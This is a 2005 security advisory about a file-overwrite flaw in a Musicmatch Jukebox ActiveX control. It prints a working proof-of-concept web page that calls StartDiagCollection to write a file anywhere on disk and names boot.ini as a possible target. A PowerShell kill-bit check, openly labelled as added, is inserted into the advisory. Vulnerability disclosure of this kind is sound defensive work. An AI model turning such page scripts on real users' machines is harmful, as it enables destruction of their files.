[NT] Yahoo Musicmatch Remote File Inclusion
From: SecuriTeam (support_at_securiteam.com)
Date: 04/19/05
To: list@securiteam.com Date: 19 Apr 2005 15:11:05 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Yahoo Musicmatch Remote File Inclusion
------------------------------------------------------------------------
SUMMARY
" <http://musicmatch.com/> Musicmatch Jukebox 10 is the most powerful way
to find and organize your music, giving you ultimate control of your music
experience. With a whole new range of library, playlist, and portable
device controls, Musicmatch Jukebox is more powerful and easier to use
than ever before." In September 2004 Musicmatch was purchased by Yahoo!
Inc.
Missing parameter validation in the Musicmatch ActiveX control allows a remote
user to write files on vulnerable systems.
DETAILS
Vulnerable Systems:
* Musicmatch versions 10.00.2047 and prior
* Musicmatch versions 9.00.5059 and prior (according to vendor)
Immune Systems:
* Musicmatch versions 9 and 10 (fixed versions since 03/21/05)
DiagCollectionControl.dll is an ActiveX control marked Safe for Scripting; its
scriptable interface exposes a method called StartDiagCollection with the
following definition:
Dispatch Function BOOL StartDiagCollection(BSTR bstrSavePath, BSTR
bstrUserEnteredInfo, BSTR bstrXMLControlFile, USERDEFINED eRequestType,
BOOL bUploadInfo, BOOL bEncryptZipFile, TR numJobs )
In this particular vulnerability, an attacker can pass a malicious value in
bstrSavePath (e.g. c:\\boot.ini). Once the method is called, whichever file is
specified gets overwritten.
Exploit:
The following is a non-malicious example:
<h1>If you have a vulnerable version a file "foo.txt" has been written to
the folder "c:\exploit".<br>
<br>It could have been used to overwrite critical system files.</h1>
<script>
var foo;
foo = new ActiveXObject("DiagCollectionControl.DiagCollectionA.1");
foo.StartDiagCollection("c:\\exploit\\foo.txt", "userinfo", "", 1, true,
false, "1");
</script>
If you have the vulnerable ActiveX control, a file foo.txt will be created in
the c:\exploit directory. Obviously, much worse can be done, as there are no
restrictions on which files can be overwritten, assuming the user has access
to them. It may be possible to control the data that goes into the file as
well, although I have not yet identified a method for doing this.
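As an added example (not part of the advisory or of Musicmatch's code), the following PowerShell checks whether the control named in the exploit above is registered on a machine, resolves its CLSID from the ProgID, and reports or sets Internet Explorer's kill bit so that script can no longer instantiate the control while the patch is rolled out. The ProgID is the one used in the exploit; the CLSID is looked up at run time, and the function names are mine.

```powershell
# Added example, not from the advisory. Kill bit = "Compatibility Flags" DWORD
# with bit 0x400 under IE's ActiveX Compatibility key for the control's CLSID.
$ProgId = 'DiagCollectionControl.DiagCollectionA.1'   # ProgID from the exploit

# 64-bit Windows keeps a second compatibility hive for 32-bit IE; use both if present.
$CompatBases = @('HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
                 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility') |
               Where-Object { Test-Path -Path $_ }

function Get-ControlKillBitStatus {
    param([string]$ProgId)
    $clsidKey = "Registry::HKEY_CLASSES_ROOT\$ProgId\CLSID"
    if (-not (Test-Path -Path $clsidKey)) {
        # Not registered: the exploit's ActiveXObject() call cannot succeed here.
        return [pscustomobject]@{ ProgId = $ProgId; Registered = $false; Clsid = $null; KillBit = $false }
    }
    $clsid  = (Get-ItemProperty -Path $clsidKey).'(default)'
    $killed = $true
    foreach ($base in $CompatBases) {
        $key = Join-Path -Path $base -ChildPath $clsid
        $v = 0
        if (Test-Path -Path $key) { $v = [int](Get-ItemProperty -Path $key).'Compatibility Flags' }
        if (($v -band 0x400) -eq 0) { $killed = $false }   # bit must be set in every hive
    }
    [pscustomobject]@{ ProgId = $ProgId; Registered = $true; Clsid = $clsid; KillBit = $killed }
}

function Set-ControlKillBit {
    # Requires an elevated shell. OR the kill bit into any existing flags so IE
    # refuses to create the control even though it stays registered for the app.
    param([string]$Clsid)
    foreach ($base in $CompatBases) {
        $key = Join-Path -Path $base -ChildPath $Clsid
        $null = New-Item -Path $key -Force
        $existing = [int](Get-ItemProperty -Path $key).'Compatibility Flags'
        $null = New-ItemProperty -Path $key -Name 'Compatibility Flags' `
                    -Value ($existing -bor 0x400) -PropertyType DWord -Force
    }
}

$status = Get-ControlKillBitStatus -ProgId $ProgId
$status
if ($status.Registered -and -not $status.KillBit) {
    Write-Warning "Control $($status.Clsid) is still scriptable; run Set-ControlKillBit -Clsid '$($status.Clsid)' from an elevated shell."
}
```

The kill bit only blocks instantiation from Internet Explorer and other hosts that honour the ActiveX Compatibility key; installing the vendor's fixed version is still the actual remedy.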
Patch Availability:
The following links can be used to find more information on the patch and
the vulnerability:
* Musicmatch Jukebox Security Updates:
<http://www.musicmatch.com/download/free/security.htm>
* Security FAQ:
<http://www.musicmatch.com/info/user_guide/faq/security_updates.htm>
ADDITIONAL INFORMATION
The information has been provided by <mailto:robfly@hyperdose.com> Robert
Fly.
The original article can be found at:
<http://www.hyperdose.com/advisories/H2005-02.txt>
The original article can be found at:
<http://www.hyperdose.com/advisories/H2005-03.txt>